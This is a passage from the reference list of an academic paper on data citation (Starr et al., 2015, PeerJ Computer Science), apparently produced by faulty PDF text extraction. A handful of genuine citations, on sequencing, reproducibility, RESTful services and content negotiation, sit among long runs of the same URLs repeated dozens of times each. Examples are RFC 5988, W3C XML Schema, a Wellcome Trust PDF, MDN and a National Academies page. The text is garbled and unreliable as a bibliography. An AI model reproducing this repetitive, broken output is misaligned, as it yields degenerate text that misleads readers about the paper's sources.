http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://www.ietf.org/rfc/rfc5988.txt https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://dx.doi.org/10.1029/2010EO340001 http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dcpapers.dublincore.org/pubs/article/view/3704/1927 http://dx.doi.org/10.1038/nrd3439-c1 http://dx.doi.org/10.7717/peerj-cs.1 Rans J, Day M, Duke M, Ball A. 2013. Enabling the citation of datasets generated through public health research. Available at http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy communications/documents/web document/wtp051762.PDF. Rekdal OB. 2014. Academic urban legends. Social Studies of Science 44(4):638–654 DOI 10.1177/0306312714535679. Richardson L, Ruby S. 2011. RESTful web services. Sebastopol CA: O’Reilly. Salzberg SL, Pop M. 2008. Bioinformatics challenges of new sequencing technology. Trends in Genetics 24:142–149 DOI 10.1016/j.tig.2007.12.006. Shendure J, Ji H. 2008. Next-generation DNA sequencing. Nature Biotechnology 26:1135–1145 DOI 10.1038/nbt1486. Shepherd, Fiumara, Walters, Stanton, Swisher, Lu, Teoli, Kantor, Smith. 2014. Content negotiation. Mozilla developer network. Available at https://developer.mozilla.org/docs/Web/ HTTP/Content negotiation. Stein L. 2010. The case for cloud computing in genome informatics. Genome Biology 11(5):207–213 DOI 10.1186/gb-2010-11-5-207. Strasser B. 2010. Collecting, comparing, and computing sequences: the making of Margaret O. Dayhoff ’s atlas of protein sequence and structure, 1954–1965. Journal of the History of Biology 43(4):623–660 DOI 10.1007/s10739-009-9221-0. Uhlir P. 2012. For attribution—developing data attribution and citation practices and standards: summary of an international workshop (2012). Technical report. The National Academies Press. Available at http://www.nap.edu/openbook.php?record id=13564. Vasilevsky NA, Brush MH, Paddock H, Ponting L, Tripathy SJ, LaRocca GM, Haendel MA. 2013. On the reproducibility of science: unique identification of research resources in the biomedical literature. PeerJ 1:e148 DOI 10.7717/peerj.148. Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 22/22 https://peerj.com/computer-science/ http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp051762.PDF http://dx.doi.org/10.1177/0306312714535679 http://dx.doi.org/10.1016/j.tig.2007.12.006 http://dx.doi.org/10.1038/nbt1486 https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation https://developer.mozilla.org/docs/Web/HTTP/Content_negotiation http://dx.doi.org/10.1186/gb-2010-11-5-207 http://dx.doi.org/10.1007/s10739-009-9221-0 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 http://www.nap.edu/openbook.php?record_id=13564 